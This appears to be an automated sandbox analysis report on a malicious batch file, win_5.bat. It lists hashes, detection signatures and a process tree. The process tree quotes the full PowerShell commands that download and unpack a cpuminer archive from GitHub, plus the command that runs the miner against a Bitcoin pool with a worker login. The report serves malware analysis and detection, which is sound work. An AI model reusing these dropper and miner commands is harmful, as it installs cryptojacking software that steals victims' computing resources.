Analysis

  • max time kernel
    1795s
  • max time network
    1800s
  • platform
    windows10-1703_x64
  • resource
    win10-20230621-en
  • resource tags

    arch:x64arch:x86image:win10-20230621-enlocale:en-usos:windows10-1703-x64system
  • submitted
    30/06/2023, 15:14

General

  • Target

    win_5.bat

  • Size

    679B

  • MD5

    18842e3757e17e2733c7460f7a56d4fd

  • SHA1

    620080cdd5c84a38aac23210a35558ec8f2086e2

  • SHA256

    66cd9049152d3e9507ca112e1a0609ff8a2ecd53fc306128a0129da7d73b0d83

  • SHA512

    08e221ae077c6bbd39272ecb106d0744ef28d15c2d1cc79ff0bb201eeedd20af3e132240fcc29b797b83073a0a16beb5ca6a24d7f181385e0337466cc976a4b0

Score
10/10
upx

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip

Signatures

  • Blocklisted process makes network request 2 IoCs
  • Executes dropped EXE 1 IoCs
  • UPX packed file 33 IoCs

    Detects executables packed with UPX/modified UPX open source packer.

  • Suspicious behavior: EnumeratesProcesses 6 IoCs
  • Suspicious use of AdjustPrivilegeToken 4 IoCs
  • Suspicious use of WriteProcessMemory 6 IoCs

Processes

  • C:\Windows\system32\cmd.exe
    C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\win_5.bat"
    1⤵
    • Suspicious use of WriteProcessMemory
    PID:2220
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "(New-Object System.Net.WebClient).DownloadFile('https://github.com/rplant8/cpuminer-opt-rplant/releases/latest/download/cpuminer-opt-win.zip', 'cpuminer-opt-win.zip')"
      2⤵
      • Blocklisted process makes network request
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:3728
    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      powershell -command "Expand-Archive -Force -Path cpuminer-opt-win.zip -DestinationPath cpuminer-opt"
      2⤵
      • Suspicious behavior: EnumeratesProcesses
      • Suspicious use of AdjustPrivilegeToken
      PID:4432
    • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe
      .\cpuminer-sse2.exe -a SHA256d -o stratum+tcp://btc.f2pool.com:1314 -u kris21.001 -p 21235365876986800
      2⤵
      • Executes dropped EXE
      • Suspicious use of AdjustPrivilegeToken
      PID:3868

Network

        MITRE ATT&CK Matrix

        Replay Monitor

        Loading Replay Monitor...

        Downloads

        • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.exe.log

          Filesize

          3KB

          MD5

          56efdb5a0f10b5eece165de4f8c9d799

          SHA1

          fa5de7ca343b018c3bfeab692545eb544c244e16

          SHA256

          6c4e3fefc4faa1876a72c0964373c5fa08d3ab074eec7b1313b3e8410b9cb108

          SHA512

          91e50779bbae7013c492ea48211d6b181175bfed38bf4b451925d5812e887c555528502316bbd4c4ab1f21693d77b700c44786429f88f60f7d92f21e46ea5ddc

        • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

          Filesize

          1KB

          MD5

          9036ec9f874b6c7285fe7de4f16e0b81

          SHA1

          935f7ef08786992344dc79a9e7234952f4214c06

          SHA256

          d4477e4e810fc4ec25e297b9cdd1b23aa9ef8faa41e2d3c70df8b433e45519bc

          SHA512

          b8cd1b0b1fbc5999905c2f3b8ba797d85902cd06a96db8048a805a0e5bf4b7c9b74da975052fdc6ce67f5f9ac38f1103e30dfd06e4f7ba764c5905d7fe00d443

        • C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_3dtcxzw3.c03.ps1

          Filesize

          1B

          MD5

          c4ca4238a0b923820dcc509a6f75849b

          SHA1

          356a192b7913b04c54574d18c28d46e6395428ab

          SHA256

          6b86b273ff34fce19d6b804eff5a3f5747ada4eaa22f1d49c01e52ddb7875b4b

          SHA512

          4dff4ea340f0a823f15d3f4f01ab62eae0e5da579ccb851f8db9dfe84c58b2b37b89903a740e1ee172da793a6e79d560e5f7f9bd058a12a280433ed6fa46510a

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt-win.zip

          Filesize

          20.9MB

          MD5

          99cc95c9ce13cf3da743e1d56dabe92d

          SHA1

          e819db3b6ad4703fbc8535dadad3ad29d3cc2039

          SHA256

          df84febc2319e8e5cca7e6d0c9341d4a6824fb28646c1e435b7da58e9f9ec59b

          SHA512

          932523c4ab20c83343395498be61497dbc9ad90b3b35d3551817b94dd530b083b07d3a4b37b04c4f3d97ed1e8bb036d9d18b079a86ce46816b3a31d9eba35c02

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe

          Filesize

          2.6MB

          MD5

          d136eb0fdd0e7826893f332c7fc3f7a2

          SHA1

          1e7fd635278e954eb0ee8cb951d16e4ecf60592f

          SHA256

          993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26

          SHA512

          895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757

        • C:\Users\Admin\AppData\Local\Temp\cpuminer-opt\cpuminer-sse2.exe

          Filesize

          2.6MB

          MD5

          d136eb0fdd0e7826893f332c7fc3f7a2

          SHA1

          1e7fd635278e954eb0ee8cb951d16e4ecf60592f

          SHA256

          993929dd32eaa7aeba81ed940fc65a9a545a8e1380be516d8086ad0376448a26

          SHA512

          895e72ad7dc045bdcff8a5e4e070fcb56a1361d99272d0f968cf9e83b7a568fe93c132c9d3e810292c08e8d7d4f8592ca7ed253be00bd3381a3f939a87b83757

        • memory/3728-127-0x0000020C7BB90000-0x0000020C7BC06000-memory.dmp

          Filesize

          472KB

        • memory/3728-128-0x0000020C7BA00000-0x0000020C7BA10000-memory.dmp

          Filesize

          64KB

        • memory/3728-129-0x0000020C7BA00000-0x0000020C7BA10000-memory.dmp

          Filesize

          64KB

        • memory/3728-144-0x0000020C7BA00000-0x0000020C7BA10000-memory.dmp

          Filesize

          64KB

        • memory/3728-124-0x0000020C7B990000-0x0000020C7B9B2000-memory.dmp

          Filesize

          136KB

        • memory/3868-321-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-311-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-346-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-343-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-342-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-282-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-283-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-284-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-286-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-289-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-293-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-295-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-296-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-299-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-301-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-305-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-308-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-341-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-314-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-316-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-317-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-320-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-337-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-323-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-325-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-327-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-328-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-331-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-333-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-334-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/3868-336-0x00007FF7FA160000-0x00007FF7FA7DD000-memory.dmp

          Filesize

          6.5MB

        • memory/4432-155-0x00000246A3010000-0x00000246A3020000-memory.dmp

          Filesize

          64KB

        • memory/4432-206-0x00000246A3000000-0x00000246A300A000-memory.dmp

          Filesize

          40KB

        • memory/4432-157-0x00000246A3010000-0x00000246A3020000-memory.dmp

          Filesize

          64KB

        • memory/4432-180-0x00000246A3010000-0x00000246A3020000-memory.dmp

          Filesize

          64KB

        • memory/4432-193-0x00000246BB2D0000-0x00000246BB2E2000-memory.dmp

          Filesize

          72KB